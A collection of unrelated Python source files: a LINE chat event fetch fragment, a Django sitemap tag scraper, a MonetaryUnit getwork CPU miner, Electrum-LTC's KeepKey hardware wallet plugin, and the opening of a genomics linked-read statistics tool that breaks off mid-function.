sqcEvents = self.client.fetchSquareChatEvents(squareChatMid, subscriptionId=self.__squareSubId[squareChatMid], syncToken=self.__squareSyncToken[squareChatMid], limit=limit, direction=1)
self.__squareSubId[squareChatMid] = sqcEvents.subscription
self.__squareSyncToken[squareChatMid] = sqcEvents.syncToken
return sqcEvents.events
|
get_tags.py
|
from threading import Thread
from requests_html import HTMLSession
from django.core.management.base import BaseCommand
from django.utils.text import slugify
from catalog.models import Tag
def crawler(url):
with HTMLSession() as session:
response = session.get(url)
tag_urls = response.html.xpath('//url/loc')
for tag_url in tag_urls:
name = tag_url.text.split('/')[-2]
tag = {'name': name}
print('tag:', tag)
Tag.objects.create(**tag)
class Command(BaseCommand):
help = 'Tag Scraper'
def handle(self, *args, **options):
url = 'https://freeessays.page/post_tag-sitemap.xml/'
Thread(target=crawler, args=(url, )).start()
print('Done!')
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2009-2015 Bitcoin Developers
# Copyright (c) 2014-2015 MonetaryUnit Developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class MonetaryUnitRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = MonetaryUnitRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_ltc.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_ltc.bip32 import BIP32Node
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_ltc.keystore import Hardware_KeyStore
from electrum_ltc.plugin import Device, runs_in_hwd_thread
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main.py
|
# Copyright (c) 2022 Ed Harry, Wellcome Sanger Institute, Genome Research Limited
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import os
import sys
import warnings
from concurrent.futures import ThreadPoolExecutor as TPE
from dataclasses import dataclass
from enum import Enum, auto
from functools import partial
from importlib import import_module
from importlib.metadata import version as get_version
from io import StringIO
from itertools import chain, groupby, tee
from pathlib import Path
from threading import Thread
import click as ck
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from tqdm import tqdm as _tqdm
from tqdm.contrib.concurrent import thread_map as _tqdm_map
mpl.use("agg")
mpl.rc("font", **{"family": "sans", "weight": "normal", "size": 14})
mpl.rcParams["agg.path.chunksize"] = 10000
plt.style.use("ggplot")
plt.rcParams["figure.figsize"] = (10.0, 7.0)
import seaborn as sb
sb.set(style="darkgrid", color_codes=True)
NAME = __name__.split(".")[0]
VERSION = get_version(NAME)
DESCRIPTION = "Collect and process statistics from aligned linked-reads."
LICENCE = (
"Copyright (c) 2022 Ed Harry, Wellcome Sanger Institute, Genome Research Limited."
)
sam_parser = getattr(import_module(NAME + "._" + NAME + "_C"), "_" + NAME)
def create_logger_handle(stream, typeid, level):
class LogFilter(logging.Filter):
def __init__(self, level):
super().__init__()
self.__level = level
def filter(self, record):
return record.levelno == self.__level
handle = logging.StreamHandler(stream=stream)
handle.setLevel(level=level)
handle.setFormatter(
logging.Formatter("[%(name)s {id}] :: %(message)s".format(id=typeid))
)
handle.addFilter(LogFilter(level=level))
return handle
LOGGER = logging.getLogger(NAME)
LOGGER.setLevel(logging.INFO)
LOGGER.addHandler(
create_logger_handle(stream=sys.stderr, typeid="status", level=logging.INFO)
)
LOGGER.addHandler(
create_logger_handle(stream=sys.stderr, typeid="error", level=logging.ERROR)
)
LOGGER.addHandler(
create_logger_handle(stream=sys.stderr, typeid="warning", level=logging.WARNING)
)
class LoggerHandle:
def __init__(self, id):
self.threads_and_handles = []
self.info = self.add_logger(log_func=LOGGER.info, id=id)
self.error = self.add_logger(log_func=LOGGER.error, id=id)
def add_logger(self, log_func, id):
read, write = os.pipe()
def _thread_func():
with os.fdopen(read, encoding="utf-8", errors="replace") as file:
for line in file:
log_func(f"({id}) {line[:-1]}")
thread = Thread(target=_thread_func)
thread.start()
self.threads_and_handles.append((thread, write))
return write
@dataclass
class LogHandles:
info: int
error: int
def __enter__(self):
return self.LogHandles(info=self.info, error=self.error)
def __exit__(self, exc_type, exc_val, exc_tb):
for thread, handle in self.threads_and_handles:
os.close(handle)
thread.join()
def _showwarning(message, category, filename, lineno, file=None, line=None):
LOGGER.warning(
f"[{filename} {lineno}] {message}"
if line is None
else f"[{filename} {lineno}] {message} {line}"
)
warnings.showwarning = _showwarning
warnings.filterwarnings("ignore", message="divide by zero")
warnings.filterwarnings("ignore", message="invalid value encountered in double_scalars")
warnings.filterwarnings("ignore", message="invalid value encountered in true_divide")
class TqdmToLogger(StringIO):
buf = ""
def __init__(self):
super(TqdmToLogger, self).__init__()
def write(self, buf):
self.buf = buf.strip("\r\n")
return len(self.buf)
def flush(self):
LOGGER.info(self.buf)
def close(self):
LOGGER.info("")
super(TqdmToLogger, self).close(self)
tqdm = partial(_tqdm, file=TqdmToLogger())
tqdm_map = partial(_tqdm_map, file=TqdmToLogger())
MOL_DATA_HEADER = (
"Sample Name",
"Molecule Length",
"No. Reads",
"MI",
"BX",
"Reference",
"Mean Read Depth",
"Mean MapQ",
"No. Gaps",
"Mean Gap Size",
"Max Gap Size",
)
COV_DATA_HEADER = ("Sample Name", "Reference", "Gap Length")
MOL_LEN_HIST_DATA_HEADER = (
"PDF",
"CDF",
"Molecule Length",
"Sample Name",
"Min No. Reads",
)
COV_GAP_HIST_DATA_HEADER = ("PDF", "CDF", "Coverage Gap Length", "Sample Name")
def ReadCSV(path, header):
df = pd.read_csv(path)
if len(df.columns.values) == len(header) and np.all(df.columns.values == header):
return df
else:
LOGGER.error(
f"Error reading '{path}'; expected header:'{header}', got:'{df.columns.values}'"
)
return pd.DataFrame()
class CallBack:
class Types(Enum):
AF = auto()
MD = auto()
CD = auto()
MLHD = auto()
CGHD = auto()
CP = auto()
PP = auto()
def __init__(self, cb_type):
self.cb_type = cb_type
@property
def is_AF(self):
return self.cb_type == self.Types.AF
@property
def is_MD(self):
return self.cb_type == self.Types.MD
@property
def is_MLHD(self):
return self.cb_type == self.Types.MLHD
@property
def is_CGHD(self):
return self.cb_type == self.Types.CGHD
@property
def is_CP(self):
return self.cb_type == self.Types.CP
@property
def is_PP(self):
return self.cb_type == self.Types.PP
@property
def is_CD(self):
return self.cb_type == self.Types.CD
class AlignmentFile(CallBack):
def __init__(self, file, ref, use_mi_tags, cluster_threshold, name=None):
super().__init__(self.Types.AF)
self.file = file
self.ref = ref
self.use_mi_tags = use_mi_tags
self.cluster_threshold = cluster_threshold
self.name = name
@property
def stem_name(self):
return self.file.stem if str(self.file) != "-" else "<stdin>"
class Data(CallBack):
def __init__(self, file, cb_type):
super().__init__(cb_type)
self.file = file
class MoleculeData(Data):
def __init__(self, file):
super().__init__(file, self.Types.MD)
class CoverageData(Data):
def __init__(self, file):
super().__init__(file, self.Types.CD)
class MolLenHistData(Data):
def __init__(self, file):
super().__init__(file, self.Types.MLHD)
class CovGapHistData(Data):
def __init__(self, file):
super().__init__(file, self.Types.CGHD)
class Prefix(CallBack):
def __init__(self, prefix, cb_type):
super().__init__(cb_type)
self.prefix = prefix
class CSVPrefix(Prefix):
def __init__(
self, prefix, save_summ, save_mol, save_cov, save_mol_hist, save_cov_hist
):
super().__init__(prefix, self.Types.CP)
self.save_summ = save_summ
self.save_mol = save_mol
self.save_cov = save_cov
self.save_mol_hist = save_mol_hist
self.save_cov_hist = save_cov_hist
@property
def any_set(self):
return (
self.save_summ
or self.save_mol
or self.save_cov
or self.save_mol_hist
or self.save_cov_hist
)
class PlotPrefix(Prefix):
def __init__(self, prefix):
super().__init__(prefix, self.Types.PP)
def ConcatDF(it):
def iter_then_empty():
yield from it
yield pd.DataFrame()
return pd.concat(iter_then_empty(), ignore_index=True)
def GetAllStats(alignment_files, molecular_data, coverage_data, min_reads, threads):
alignment_files = tuple(alignment_files)
def GetAllStatsFromAFs():
@dataclass(frozen=True, eq=True)
class BasicStats:
median_insert_size: int
total_read_length: int
total_alignments: int
total_dup: int
total_qcf: int
total_unm: int
total_nomi: int
total_nobx: int
total_zeromq: int
def ReadSAM(alignment_file, threads):
with LoggerHandle(id=f"Read {alignment_file.stem_name}") as handles:
(
genome_length,
ref_names,
basic_stats,
molecule_data,
coverage_gaps,
) = sam_parser(
log=handles.info,
error=handles.error,
num_threads=threads,
group_cutoff_dis=alignment_file.cluster_threshold,
sam_file_name=str(alignment_file.file),
fasta_file_name=alignment_file.ref,
override_name=alignment_file.name,
fallback_name=alignment_file.stem_name,
use_mi=alignment_file.use_mi_tags,
)
return (
genome_length,
{name: BasicStats(*stats) for name, stats in basic_stats},
tuple(
(name, tuple((ref_names[tid], t2) for tid, t2 in t1))
for name, t1 in molecule_data
),
tuple(
(name, tuple((ref_names[tid], t2) for tid, t2 in t1))
for name, t1 in coverage_gaps
),
)
def GetStats(alignment_file, threads):
genome_length, basic_stats, molecule_data, coverage_gaps = ReadSAM(
alignment_file, threads
)
molecule_data = pd.DataFrame(
(
(
name,
max(0, pos_max - pos_min),
n_reads,
mi,
bx,
reference_name,
total_read_length / max(1, pos_max - pos_min),
total_mapping_quality / n_reads,
len(gaps),
np.mean(gaps) if len(gaps) > 0 else 0,
max(gaps) if len(gaps) > 0 else 0,
)
for name, a in molecule_data
for reference_name, b in a
for (bx, _), c in b
for n_reads, mi, total_mapping_quality, pos_min, pos_max, total_read_length, gaps in c
),
columns=MOL_DATA_HEADER,
)
coverage_data = pd.DataFrame(
(
(name, reference_name, c)
for name, a in coverage_gaps
for reference_name, b in a
for c in b
),
columns=COV_DATA_HEADER,
)
def n_stats(data, ns):
d = np.cumsum((0,) + tuple(np.sort(data)[::-1]))
return tuple(
d[x] - d[x - 1]
for n in ns
for x in (np.where(d >= (d[-1] * n / 100))[0].min(),)
)
return (
molecule_data,
